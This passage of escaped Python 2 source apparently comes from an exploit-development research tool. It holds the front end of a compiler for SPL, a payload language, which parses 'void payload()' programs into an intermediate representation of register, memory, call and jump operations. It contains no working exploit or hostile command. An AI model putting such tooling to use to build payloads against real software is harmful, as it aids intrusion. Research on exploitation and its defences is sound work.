;)\nasg_ops = ['+=', '-=', '*=', '/=', '&=', '|=', '^=', '~=', '>>=', '<<=']\ncmp_ops = ['==', '!=', '>',  '>=', '<',  '<=']\n\n\n# The regular expressions to match various tokens\n_reg_    = r'^__r[0-7]$'\n_var_    = r'^[a-zA-Z_][a-zA-Z_0-9]*$'\n_number_ = r'^(((\\+|\\-)?[0-9]+)|(0x[0-9a-fA-F]+))$'\n_rvalue_ = r'^(((\\+|\\-)?[0-9]+)|(0x[0-9a-fA-F]+)|(\\&[a-zA-Z_][a-zA-Z_0-9]*))$'\n_asgop_  = r'^\\+=|\\-=|\\*=|\\/=|\\&=|\\|=|\\^=|\\~=|\\>\\>=|\\<\\<=$'\n_cmpop_  = r'^\\=\\=|\\!\\=|\\>|\\>\\=|\\<|\\<\\=$'\n\n\n\n\n# -------------------------------------------------------------------------------------------------\n# compile: This is the main class that compiles an SPL program into its equivalent IR form.\n#\nclass compile( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL VARIABLES                                    '''\n    ''' ======================================================================================= '''\n    __prog          = ''                            # program's file name\n    __state         = STATE_IDLE                    # program's state\n    __lineno        = 1                             # current line number for parsing\n    __pc            = START_PC                      # program counter (initialized)\n    __uid           = 0                             # IR unique identifier\n    __label_dict    = { }                           # label lookup\n    __vartab        = { }                           # variable table\n    __ir            = [ ]                           # intermediate list\n\n\n    ''' ======================================================================================= '''\n    '''                                   AUXILIARY FUNCTIONS                                   '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __syn_err(): A syntax error is fatal. Print a verbose explanation and halt execution.\n    #\n    # :Arg err: Error to display\n    # :Ret: None.\n    #\n    def __syn_err( self, err, lineno ):\n        fatal(\"%s:%d : Syntax Error: %s\" % (self.__prog, lineno, err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __sem_err(): A semantic error is fatal as well. Print a verbose explanation and halt\n    #       execution.\n    #\n    # :Arg err: Error to display\n    # :Ret: None.\n    #\n    def __sem_err( self, err ):\n        fatal(\"%s : Semantic Error: %s\" % (self.__prog, err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __sem_warn(): A semantic warning isn't fatal, but it's still important. Print a verbose\n    #       explanation and continue execution.\n    #\n    # :Arg err: Error to display\n    # :Ret: None.\n    #\n    def __sem_warn( self, msg ):\n        warn(\"%s : Semantic Warning: %s\" % (self.__prog, msg))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __multi_re(): Extend regular expression matching to lists. Instead of applying 1 regex in a\n    #       single string, __multi_re() applies a list of regexes in a list of strings. A list of\n    #       errors is also supplied in case that a regex fails.\n    #\n    # :Arg stmt: List of statements to match\n    # :Arg regex: List of regular expressions for statements\n    # :Arg err: List of errors in case of a mismatch\n    # :Ret: None.\n    #\n    def __multi_re( self, stmt, regex, err ):\n        stmt, lno = zip(*stmt)\n\n        if len(stmt) != len(regex):                 # check if parameters match\n            self.__syn_err( \"Invalid number of parameters\", lno[0] )\n\n        for i in range(len(stmt)):                  # for each string in list\n            try:\n                if not re.match(regex[i], stmt[i]): # apply regex\n                    self.__syn_err(\"%s '%s'\" % (err[i], stmt[i]), lno[i])\n            except IndexError: pass\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __ir_add(): Add a \"compiled\" statement to IR.\n    #\n    # :Arg tup: A tuple containing the statement\n    # :Ret: None.\n    #\n    def __ir_add( self, tup ):\n        # extend statement and add it to IR (along with its pc)\n        self.__ir.append( ['@__' + str(self.__pc), dict([('uid',self.__uid)] + tup.items())] )\n\n        # __pc and __uid are equal for now, but they're going be different after optimization.\n        self.__pc  = self.__pc  + _STEP_UP          # increase program counter\n        self.__uid = self.__uid + _STEP_UP          # assign a unique id to each statement\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     SYNTAX ANALYSIS                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __check_prog_state(): A decorator function (== hook) that is called before every statement\n    #       parsing and verifies that all statements are inside payload() declaration.\n    #\n    # :Arg func: Function to invoke from decorator\n    # :Ret: Decorator function.\n    #\n    def __check_prog_state( func ):\n        def stmt_intrl( self, stmt ):\n            dbg_prnt(DBG_LVL_3, \"Parsing statement: \" + ' '.join(zip(*stmt)[0]))\n\n            if self.__state != STATE_START:\n                self.__syn_err(\"Statement outside of !PROGRAM directives\")\n\n            func(self, stmt)                        # invoke the appropriate statement function\n\n        return stmt_intrl                           # return decorator\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_program(): A payload declaration has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    def __stmt_program( self, stmt ):\n        if self.__state == STATE_IDLE:\n            # we haven't declare payload() yet. Make sure that declaration is \"void payload() {\"\n            if len(stmt) != 5:\n                self.__syn_err(\"Invalid number of aaa operands\", stmt[0][L])\n\n            self.__multi_re(stmt,\n                [r'^void$', r'^payload$', r'^\\($', r'^\\)$', r'^\\{$'],\n                [\"Invalid function declaration\"]*5\n            )\n\n            self.__state = STATE_START              # change state\n\n            # A pseudo-statement to avoid corner cases (needed for building the delta graph)\n            self.__ir_add( {'type':'entry'} )\n\n\n        elif self.__state == STATE_START:\n            # we're looking to close payload() declaration (\"}\")\n            if len(stmt) != 1:\n                self.__syn_err(\"Code outside of function!\", stmt[1][L])\n\n            self.__multi_re(stmt, [r'^}$'],[\"Unknown\"] )\n\n            self.__state = STATE_END                # change state\n\n\n        else:\n            self.__syn_err(\"Invalid program state\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_var(): A variable assignment has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_var( self, stmt ):\n        # stmt[0] has already been checked. Some checks are redundant here, but we do them to keep\n        # functions autonomous.\n\n        # ---------------------------------------------------------------------\n        if re.search(r'^string$', stmt[0][T]):\n            # start with the easy one\n            self.__multi_re( stmt[1:],\n                [_var_, r'^=$', r'^\".*\"$',],\n                [\"Invalid variable name\", \"Expected '=', but found\", \"Invalid assigned value\"]\n            )\n\n            val = [stmt[3][T][1:-1].decode('string_escape')]\n\n        # ---------------------------------------------------------------------\n        elif re.search(r'^int$', stmt[0][T]):\n            self.__multi_re( stmt[1:3],\n                [_var_, r'^=$'],\n                [\"Invalid variable name\", \"Expected '=', but found\"]\n            )\n\n            try:\n                if re.search(_rvalue_, stmt[3][T]): # single R-value\n\n                    if stmt[3][T][0] == '&':\n                        val = [(stmt[3][T][1:],)]\n                    else:\n                        val = [struct.pack('<Q', int(stmt[3][T], 0))]\n\n                else:                               # array of R-values\n                    val = []\n\n                    self.__multi_re( [stmt[3]] + [stmt[4]] + [stmt[-1]],\n                        [r'^\\{$', _rvalue_, r'^\\}$'],\n                        [\"Expected '{', but found\", \"Invalid R-value\", \"Expected '}', but found\"]\n                    )\n\n                    if stmt[4][T][0] == '&':\n                        val.append( (stmt[4][T][1:],) )\n                    else:\n                        val.append(struct.pack('<Q', int(stmt[4][T], 0)))\n\n                    # parse all R-values\n                    for i in range(5, len(stmt)-1, 2):\n                        self.__multi_re( [stmt[i]] + [stmt[i+1]],\n                            [r'^,$', _rvalue_],\n                            [\"Expected ',', but found\", \"Invalid R-value\" ]\n                        )\n\n                        if stmt[i+1][T][0] == '&':\n                            val.append( (stmt[i+1][T][1:],) )\n                        else:\n                            val.append(struct.pack('<Q', int(stmt[i+1][T], 0)))\n\n            except IndexError:\n                self.__syn_err(\"Invalid number of arguments\", stmt[0][L])\n\n        # ---------------------------------------------------------------------\n        else:\n            self.__syn_err(\"Invalid type\", stmt[0][L])\n\n\n        # ---------------------------------------------------------------------\n        # This is a semantic check, but it's better to do it here\n        # ---------------------------------------------------------------------\n        if stmt[1][T] in self.__vartab:             # check if variable has already been declared\n            self.__sem_err(\"Redeclaration of '%s'\" % stmt[1][T])\n\n        self.__vartab[ stmt[1][T] ] = val           # if not, add variable to vartab\n\n        # add statement to IR\n        self.__ir_add( {'type':'varset', 'name':stmt[1][T], 'val':val} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_reg(): A register assignment/modification or a memory read has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_reg( self, stmt ):\n        self.__multi_re( [stmt[0]], [_reg_], [\"Invalid register name\"])\n\n\n        # ---------------------------------------------------------------------\n        # Memory read\n        # ---------------------------------------------------------------------\n        if re.search(r'^=$', stmt[1][T]) and re.search(r'^\\*$', stmt[2][T]) and len(stmt) == 4:\n            self.__multi_re( [stmt[3]], [_reg_], [\"Invalid R-value\"])\n\n            self.__ir_add({'type':'memrd', 'reg':int(stmt[0][T][3],0), 'mem':int(stmt[3][T][3],0)})\n\n\n        # ---------------------------------------------------------------------\n        # Register assignment\n        # ---------------------------------------------------------------------\n        elif re.search(r'^=$', stmt[1][T]) and len(stmt) == 3:\n            self.__multi_re( [stmt[2]], [_rvalue_], [\"Invalid R-value\"])\n\n            if stmt[2][T][0] == '&':\n                self.__ir_add( {'type'  : 'regset',\n                                'reg'   : int(stmt[0][T][3]),\n                                'valty' : 'var',\n                                'val'   : (stmt[2][T][1:],)} )\n\n            else:\n                self.__ir_add( {'type'  : 'regset',\n                                'reg'   : int(stmt[0][T][3]),\n                                'valty' : 'num',\n                                'val'   : int(stmt[2][T], 0)} )\n\n\n        # ---------------------------------------------------------------------\n        # Register modification\n        # ---------------------------------------------------------------------\n        elif re.search(_asgop_, stmt[1][T]) and len(stmt) == 3:\n            self.__multi_re( [stmt[2]], [_number_], [\"Invalid number\"])\n\n\n            self.__ir_add( {'type': 'regmod',\n                            'reg' : int(stmt[0][T][3]),\n                            'op'  : stmt[1][T][:-1],\n                            'val' : int(stmt[2][T], 0)} )\n\n        # ---------------------------------------------------------------------\n        # Unknown register operation\n        # ---------------------------------------------------------------------\n        else:\n            self.__syn_err(\"Unknown operator '%s'\" % stmt[1][T], stmt[1][L])\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_memwr(): An memory write statement has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_memwr( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^\\*$', _reg_, r'^=$', _reg_],\n            [\"Expected '*', but found\", \"Invalid register name\", \"Expected '=', but found\",\n             \"Invalid register name\"]\n        )\n\n        self.__ir_add( {'type':'memwr', 'mem':int(stmt[1][T][3],0), 'val':int(stmt[3][T][3],0)} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_call(). A library/system call has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_call( self, stmt ):\n        call = find_call(stmt[0][T])\n\n        if not call:\n            self.__syn_err( \"Function '%s' is not supported\" % stmt[0][T], stmt[0][L] )\n\n        # this check is redundant\n        self.__multi_re( [stmt[1]] + [stmt[-1]],\n            [r'^\\($', r'^\\)$'],\n            [\"Expected '(', but found\", \"Expected ')', but found\"]\n        )\n\n        args = []\n        if len(stmt) - 3 > 0:\n            for i in range(2, len(stmt)-1, 2):\n                self.__multi_re( [stmt[i]] + [stmt[i+1]],\n                    [_reg_, r'^,$' if len(stmt)-2 > i+1 else r'^\\)$'],\n                    [\"Invalid register name\", \"Unexpected symbol\"]\n                )\n\n                args.append( int(stmt[i][T][3]) )\n\n\n        # both syscalls and libcalls have the same calling convention (in x64) so we're good ;)\n        # we don't need to distinguish them\n\n        # check if call has the right number of arguments (for non-variadic ones)\n        if len(args) != call[1] and call[1] != INFINITY:\n            self.__syn_err( \"Function '%s' has an invalid number of arguments\" %\n                    stmt[0][T], stmt[0][L] )\n\n        # check max number of registers (arguments) in calling convention\n        maxlen = len(SYSCALL_CC) if find_syscall(stmt[0][T]) else len(LIBCALL_CC)\n\n        if len(args) > maxlen:\n           self.__syn_err(\"SPL supports functions with up to %d arguments\" % maxlen, stmt[0][L])\n\n\n        self.__ir_add( {'type':'call', 'name':stmt[0][T], 'args':args, 'dirty':call[2], 'alt':[]} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_label(): A label has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_label( self, stmt ):\n        # check if label is in correct form\n        self.__multi_re( stmt, [_var_], [\"Invalid label name\"] )\n\n        # give a UID to that label\n        # Our semantic analysis states that \"every label must be followed by a statement\". So we\n        # set the UID to be equal with the UID of the next statement. This is because labels\n        # are pseudo-statements (they're not part of the IR) and we want the jump target to be\n        # at the statement after it.\n        #\n        # (self.__pc points to the current statement, so +_STEP_UP will point to the next)\n        self.__label_dict[ stmt[0][T] ] = '@__' + str(self.__pc + _STEP_UP)\n\n        # add a dummy label (needed for slicing during optimization)\n        self.__ir_add( {'type':'label'} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_cond(): An conditional jump statement has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_cond( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^if$', r'^\\($', _reg_, _cmpop_, _number_, r'^\\)$', r'^goto$', _var_],\n            [\"Expected 'if', but found\",\n             \"Expected '(', but found\",\n             \"Expected register, but found\",\n             \"Invalid comparison operator\",\n             \"Invalid number\",\n             \"Expected ')', but found\",\n             \"Expected 'goto', but found\",\n             \"Invalid goto target\"]\n        )\n\n        # When an conditional jump branches to a label that hasn't been declared yet, we add a\n        # temporary jump target. After parsing is done, __label_dict will contain all labels,\n        # so we can go back and fix missing target.\n        self.__ir_add( {'type'   : 'cond',\n                        'reg'    : int(stmt[2][T][3]),\n                        'op'     : stmt[3][T],\n                        'num'    : int(stmt[4][T], 0),\n                        'target' : stmt[7][T]} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_jump(): An jump statement (goto) has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_jump( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^goto$', _var_],\n            [\"Expected 'goto', but found\", \"Invalid goto target\"]\n        )\n\n        self.__ir_add( {'type':'jump', 'target':stmt[1][T]} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_return(): An return statement has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_return( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^return$', _number_],\n            [\"Expected 'return', but found\", \"Invalid return address\"]\n        )\n\n        self.__ir_add( {'type':'return', 'target':int(stmt[1][T],0)} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __do_syntax_parsing(): This is where syntax analysis starts. Function takes as input the SPL\n    #       program (expressed as a list of tokens) and checks whether it follows the EBNF.\n    #\n    # :Arg tokens: A list of all tokens from the SPL program\n    # :Ret: None. If a syntax error occurs, an exception will be raised.\n    #\n    def __do_syntax_parsing( self, tokens ):\n\n        # -------------------------------------------------------------------------------\n        # Merge tokens into statements\n        # -------------------------------------------------------------------------------\n        stmts, stmt = [], []\n\n        for symbol, lineno in tokens:               # for each token\n            if symbol != ';' and symbol != ':':     # not a statement delimiter?\n\n                # if a memory read/write is used, make sure that '*' operator is separated\n                if re.search(r'^\\*__r.*$', symbol):                     \n                    stmt.append( ('*', lineno) )\n                    stmt.append( (symbol[1:], lineno) )\n                else:\n                    stmt.append( (symbol, lineno) ) # append it to the current statement\n\n            else:                                   # statement delimiter\n                stmts.append(stmt)                  # append statement to the statements list\n                stmt = []                           # clear current statement\n\n        if stmt: stmts.append(stmt)                 # push any leftovers to the list\n\n\n        # The 1st statement should be the function declaration: \"void payload() {\". However it\n        # also contains the 2nd statement (up to the first delimiter). Split this statement.\n        stmt = stmts.pop(0)                         # get 1st statement\n\n        if len(stmt) < 5:                           # not the expected size?\n            self.__syn_err(\"Invalid function declaration\", stmt[0][L])\n\n        stmts = [stmt[:5], stmt[5:]] + stmts        # split it and push it back\n\n\n        # -------------------------------------------------------------------------------\n        # To keep the code simple, each statement is parsed in its own function. Here,\n        # we quickly identify the type of statement and we invoke the right function to\n        # further process it.\n        # -------------------------------------------------------------------------------\n        for stmt in stmts:                          # for each statement\n            # function declaration starts with 'void' and ends with '}':\n            #   [('void', 1), ('payload', 1), ('(', 1), (')', 1), ('{', 1)]\n            #   [('}',10)]\n            if re.search(r'^void$', stmt[0][T]) or re.search(r'^}$', stmt[0][T]):\n                self.__stmt_program(stmt)\n\n            # Variable assignments start with 'int' or 'string':\n            #   [('int', 2), ('a', 2), ('=', 2), ('0x10', 2)]\n            elif re.search(r'^int|string$', stmt[0][T]):\n                self.__stmt_var(stmt)\n\n            # Register assignments/modifications and memory reads start with '__r':\n            #   [('__r0', 4), ('=', 4), ('1', 4)]\n            elif re.search(r'^__r.*', stmt[0][T]):\n                self.__stmt_reg(stmt)\n\n\n            # Memory writes start with '*':            \n            #  [('*', 14), ('__r1', 14), ('=', 14), ('__r0', 14)]\n            elif re.search(r'^\\*', stmt[0][T]):\n                self.__stmt_memwr(stmt)\n\n            # Labels consist of a single token:\n            #   [('LABEL', 5)]\n            elif len(stmt) == 1:\n                self.__stmt_label(stmt)\n\n            # Calls have a '(' as 2nd token and a ')' as last token:\n            #   [('func', 6), ('(', 6), ('__r0', 6), (',', 6), ('__r1', 6), (',', 6), (')', 6)]\n            #\n            # (we already know that len(stmt) > 1, so we can access stmt[1])\n            elif re.search(r'^\\($', stmt[1][T]) and re.search(r'^\\)$', stmt[-1][T]):\n                self.__stmt_call(stmt)\n\n            # Conditional statements start with 'if':\n            #   [('if', 7), ('(', 7), ('__r0', 7), ('>', 7), ('=', 7), ('0x0', 7), (')', 7),\n            #    ('goto', 7), ('LABEL', 7)]\n            elif re.search(r'^if$', stmt[0][T]):\n                self.__stmt_cond(stmt)\n\n            # Jump statements start with 'goto':\n            #   [('goto', 8), ('LABEL', 8)]\n            elif re.search(r'^goto$', stmt[0][T]):\n                self.__stmt_jump(stmt)\n\n            # Returns statements start with 'return':\n            #   [('return', 9), ('0x4006fe', 9)]\n            elif re.search(r'^return$', stmt[0][T]):\n                self.__stmt_return(stmt)\n\n            # Othewise we have a syntax error...\n            else:\n                self.__syn_err(\"Unknown keyword '%s'\" % stmt[0][T], stmt[0][L])\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                    SEMANTIC ANALYSIS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __fix_jump_targets(): Fix target labels (replace names with pc) for conditional jumps.\n    #\n    # :Ret: None.\n    #\n    def __fix_jump_targets( self ):\n        dbg_prnt(DBG_LVL_2, \"Fixing jump/goto targets...\")\n\n        for _, stmt in self.__ir:                   # for each jump statement\n            if stmt['type'] == 'cond' or stmt['type'] == 'jump':\n                try:\n                    # find pc that label belongs to\n                    stmt['target'] = self.__label_dict[ stmt['target'] ]\n                except KeyError:\n                     self.__sem_err(\"Label '%s' is not declared\" % stmt['target'])\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __do_semantic_checks(): Perform a basic semantic analysis. This function performs a series\n    #       of some semantic checks that IR has to pass.\n    #\n    # :Ret: None. If a semantic error occurs, an exception will be raised.\n    #\n    def __do_semantic_checks( self ):\n        dbg_prnt(DBG_LVL_2, \"Semantic analysis started.\")\n\n\n        # --------------------------------=[ CHECK #1 ]=---------------------------------\n        # -----------------=[ \"A variable can be declared only once\" ]=------------------\n        #\n        # This check is already done in __stmt_var() as it's way easier to do it there.\n\n\n        # --------------------------------=[ CHECK #2 ]=---------------------------------\n        # ----------=[ \"An return must be the last statement of the program\" ]=----------\n        nret = len([s for _, s in self.__ir if s['type'] == 'return'])\n\n        if nret > 1 or nret == 1 and self.__ir[-1][1]['type'] != 'return':\n            self.__sem_err(\"Only one return is allowed and only at the end of the program\")\n\n\n        # --------------------------------=[ CHECK #3 ]=---------------------------------\n        # --------------------=[ \"A statement must follow a label\" ]=--------------------\n        #\n        # A tricky check. First we check whether the last statement is _not_ a label. Then, we get\n        # all statements (we only care about statement type -VARSET, etc) that follow a label\n        # (there's always a next statement after a label, because the last statement is not label)\n        # and check whether there are labels there.\n        #\n        if self.__ir[-1][1]['type'] == 'label' or \\\n           'label' in [self.__ir[i+1][1]['type'] for i, (_, s) in enumerate(self.__ir) \\\n           if s['type'] == 'label']:\n                self.__sem_err(\"A label must be followed by a statement (labels are not statements)\")\n\n\n        # --------------------------------=[ CHECK #4 ]=---------------------------------\n        # -------=[ \"A variable/register must be assigned before it gets used\" ]=--------\n        #\n        # Here we \"simulate\" the IR. When we encounter an assignment, we mark this variable/\n        # register. When we use a variable/register, we check if it's marked. Note that this\n        # check does not consider the control flow of the program (e.g. conditional jumps and\n        # goto).\n        #\n        tvar, treg = { }, { }                       # temp variable and register tables\n\n        for _, stmt in self.__ir:                   # for each statement (linear sweep)\n            \n            # -----------------------------------------------------------------\n            if stmt['type'] == 'varset':\n                for val in stmt['val']:\n                    if isinstance(val, tuple):\n                        if val[0] in tvar:\n                            tvar[ val[0] ] = 1      # mark variable\n                        else:\n                            self.__sem_err(\"Variable '%s' referenced before assignment\" % val[0])\n\n                # add this after isinstance() check to catch cases like $c := [$c]\n                # mark variable (if it's set for 2nd time don't make it 0)\n                tvar[ stmt['name'] ] = tvar.get(stmt['name'], 0) * 1\n\n            \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'regset':\n                if isinstance(stmt['val'], tuple):  # reference of another variable?\n                    if stmt['val'][0] in tvar:\n                        tvar[ stmt['val'][0] ] = 1  # mark variable\n                    else:\n                        self.__sem_err(\"Variable '%s' referenced before assignment\" % stmt['val'][0])\n\n\n                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1\n\n            \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'regmod':\n                if stmt['reg'] in treg:\n                    treg[ stmt['reg'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['reg'])\n                   \n           \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'memrd':\n                if stmt['mem'] in treg:\n                    treg[ stmt['mem'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['mem'])\n\n                # mark register being set\n                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1\n\n                \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'memwr':\n                if stmt['mem'] in treg:\n                    treg[ stmt['mem'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['mem'])\n\n                if stmt['val'] in treg:\n                     treg[ stmt['val'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['val'])\n\n\n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'cond':\n                if stmt['reg'] in treg:\n                    treg[ stmt['reg'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['reg'])\n\n\n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'call':\n                for arg in stmt['args']:\n                    if arg in treg:\n                        treg[ arg ] = 1\n\n                    else:\n                        self.__sem_err(\"Register '__r%d' referenced before assignment\" % arg)\n\n\n        # --------------------------------=[ CHECK #5 ]=---------------------------------\n        # -------------------=[ \"A variable/register must be used\" ]=--------------------\n        #\n        # Here we check if there are any registers/variables that are unused. This is actually\n        # gets calculated on the previous check. If a variable/register is used, the treg/tvar\n        # it will be 1. Otherwise it's 0. Note that this is a soft error. Execution doesn't\n        # halt when checks fails.\n        #        \n        for reg, used in treg.iteritems():\n            if not used:\n               self.__sem_warn(\"Register '__r%d' is unused\" % reg)\n\n        for var, used in tvar.iteritems():\n            if not used:\n                self.__sem_warn(\"Variable '%s' is unused\" % var)\n\n        del treg\n        del tvar\n\n\n        # -----------------------------=[ OPTIONAL CHECKs ]=-----------------------------\n        # There are other checks that we could do as well:\n        #   [1]. A label must be referenced\n        #   [2]. A variable must be declared only once\n        #   ...\n        #\n\n        dbg_prnt(DBG_LVL_2, \"Semantic analysis completed.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                 MISCELLANEOUS FUNCTIONS                                 '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # _calc_stats(): Collect some statistics regarding generated IR.\n    #\n    # :Ret: None.\n    #\n    def _calc_stats( self ):\n        # nreal: the number of real statement (those that need a candidate block)\n        self.nreal = 0\n\n        for stmt in self:                           # for each statement\n            if stmt['type'] not in ['entry', 'varset', 'label', 'jump', 'return']:\n                self.nreal += 1\n\n        # nregs contains the number of distinct virtual registers. This is calculated as follows:\n        # It iterates over all statements and gets all registers in 'regset' statements (thanks\n        # to our semantic analysis, it's not allowed for a 'regmod' to use a register that hasn't\n        # been used in a previous 'regset'; thus we only care about 'regset'). Then in counts the\n        # distinct registers by transforming the list into a set.\n        self.nregs = len( set([s['reg'] for s in self if s['type'] in ['regset', 'memrd']]) )\n\n        # the number of distinct variables. The processing is identical to nregs\n        self.nvars = len( set([s['name'] for s in self if s['type'] == 'varset']) )\n\n        # the number of distinct variables that their references are assigned to registers\n        self.nregvars = len( set([s['val'][0] for s in self\n                                    if s['type'] == 'regset' and isinstance(s['val'], tuple)]) )\n\n        # the number of \"free\" variables. Free variables are not assigned to any register, so\n        # they can be placed at any memory address (due to the AWP)\n        self.nfreevars = self.nvars - self.nregvars\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg filename: The SPL source file name\n    #\n    def __init__( self, filename ):\n        self.__prog = filename                      # program's file name is all we need\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __getitem__(): Get i-th statement from IR. Out-of-order statements are groups in the same\n    #       list entry, so we cannot find them in O(1) without some auxiliary data struct. For\n    #       now we simply do a linear search.\n    #\n    # :Arg idx: Index of the IR statement\n    # :Ret: The requested IR statement\n    # \n    def __getitem__( self, idx ):\n        assert( idx >= 0 )                          # bound checks\n\n        for _, stmt in self.__ir:                   # for each IR statement list\n            # each list has a single element here\n            if stmt[0]['uid'] == idx: return stmt   # if index found return statement\n\n        raise IndexError(\"No statement with uid = %d found\" % idx )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __len__(): Get the number of IR statements.\n    #\n    # :Ret: Each time function returns a different statement.\n    #\n    def __len__( self ):\n        return len(self.__ir)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __iter__(): Iterate over all statements. This function is a generator over all statements\n    #       (no matter if they are out-of-order or not).\n    #\n    # :Ret: Each time function returns a different statement.\n    #\n    def __iter__( self ):\n        for _, stmt_r in self.__ir:                 # for each IR statement list\n            for stmt in stmt_r:                     # for each \"parallel\" statement\n                yield stmt                          # return next statement\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # compile(): Compile the source file into its Intermediate Representation (IR). Make sure that\n    #       the file follows the syntax of and the semantics of the SPL.\n    #\n    # :Ret: None. If an error occurs, program will terminate.\n    #\n    def compile( self ):\n        dbg_prnt(DBG_LVL_1, \"Compiling '%s'...\" % self.__prog)\n        dbg_prnt(DBG_LVL_2, \"Parsing started.\")\n\n        tokens = []                                 # place all tokens here\n\n        try: \n            with open(self.__prog, \"r\") as file:    # open source file\n                # -----------------------------------------------------------------------\n                # Do the lexical analysis here\n                # -----------------------------------------------------------------------\n                for line in file:                   # process it line by line\n                    # drop all comments \"//\" from current line (be careful though to not\n                    # drop \"comments\" that are inside quotes)\n                    line = re.sub(\"(?!\\B\\\"[^\\\"]*)\\/\\/(?![^\\\"]*\\\"\\B).*\\n\", '', line)\n\n\n                    # tokenize line and append it to the token list\n                    lexical = shlex.shlex(line)     # create a lexical analysis object\n\n                    # TODO: this is not recognized as comment: //string s2 = \"/this\";\n\n                    #  lexical.commenters = '//'    # alternative way to drop comments\n                    lexical.wordchars += ''.join(set(''.join(asg_ops + cmp_ops) + '+-&'))\n\n                    symbols = [token for token in lexical]\n                    if symbols:                     # if there are any tokens\n\n                        # tokens are tuples (symbol, line number)\n                        tokens += zip(symbols, [self.__lineno]*len(symbols))\n\n                    self.__lineno = self.__lineno+1 # update line counter\n\n        except IOError:\n            fatal(\"File '%s' not found\" % self.__prog)\n\n\n\n        self.__do_syntax_parsing(tokens)            # do the syntax analysis\n\n        dbg_prnt(DBG_LVL_2, \"Parsing complete.\")\n\n        # ===-----\n        # At this point, program has a valid syntax. We move on the semantic analysis\n        # ===-----\n\n        self.__fix_jump_targets()                   # fix goto branches (label => pc)\n        self.__do_semantic_checks()                 # do the semantic checks\n\n\n        # at this point each statement is the form: [pc, stmt]. This form is not suitable for\n        # out of order statements, as we want them in the form: [pc, [stmt1, stmt2, ...]]. This\n        # the job of the optimizer, but for now we have to prepare IR accordingly, so we convert\n        # each statement into the form: [pc, [stmt]].\n        for s in self.__ir: s[1] = [s[1]]\n\n        self._calc_stats()                          # get IR statistics\n\n        dbg_prnt(DBG_LVL_1, \"Compilation completed.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # get_ir(): Return the compiled IR.\n    #\n    # :Ret: The IR.\n    #\n    def get_ir( self ):\n        return self.__ir\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
